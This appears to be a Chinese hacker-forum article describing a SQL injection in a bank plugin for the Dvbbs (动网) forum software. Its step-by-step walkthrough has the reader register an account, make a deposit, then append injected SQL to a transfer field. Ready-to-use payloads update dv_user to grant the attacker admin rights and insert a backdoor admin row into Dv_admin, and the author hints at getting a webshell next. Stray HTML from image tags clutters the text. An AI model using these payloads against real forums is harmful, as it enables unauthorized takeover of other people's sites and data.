文章作者:kon-bluesky信息来源:邪恶八进制信息安全团队 不知道这个漏洞以前是不是有过.不过即然我发现了.我就发表出来.跟大家一起学习下.利用的是动网的一个银行插件漏洞.如果是SQL版本的.并且用了这个插件.成功率很高.下面我就这个漏洞来详细的说明一个.文章所利用的网站.希望大家不要再破坏了.首先我们注册一个用户.这里我己经注册好了.我就不再注册了.用户名:kon-bluesky =800) window.open('/UpLoadFiles/NewsPhoto/71bd58db.jpg');" src="http://hackbase.com/UpLoadFiles/NewsPhoto/71bd58db.jpg" onload="if(this.width>'800')this.width='800';if(this.height>'800')this.height='800';" border=0> 然后大家去社区银行里面.首先存一下款.要不然等会转账的时候会出现错误.存好之后.我们就来转账. =800) window.open('/UpLoadFiles/NewsPhoto/d4ee0e84.jpg');" src="http://hackbase.com/UpLoadFiles/NewsPhoto/d4ee0e84.jpg" onload="if(this.width>'800')this.width='800';if(this.height>'800')this.height='800';" border=0> 在后面写上这条语句:test1';update dv_user set usergroupid=1 where userid=107112-- (userid就是你注册的用户ID,可以在用户列表里面看到) 这条语句的作用是把我们注册的用户提升为前台管理员.成功之后.就是前台管理员了.然后再进行一次转账.跟上次一样的操作.不过语句不同了.提升为后台管理员语句:test1';Insert into Dv_admin(Password,Username,Adduser,Flag) values('49ba59abbe56e057','kon-bluesky','kon-bluesky','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36')-- (49ba59abbe56e057,MD5密码.根据自己所需进行改动.用户也是一样) 这条语句就是把kon-bluesky提升为后台管理员. =800) window.open('/UpLoadFiles/NewsPhoto/3a49d1eb.jpg');" src="http://hackbase.com/UpLoadFiles/NewsPhoto/3a49d1eb.jpg" onload="if(this.width>'800')this.width='800';if(this.height>'800')this.height='800';" border=0> 至于怎么拿到WEBSHELL.就不在这篇文章的范围之内.很简单的.本地恢复就行了.由于第一次在八进制上面发表文章.不是很熟.所以有很多图片都没有发上来.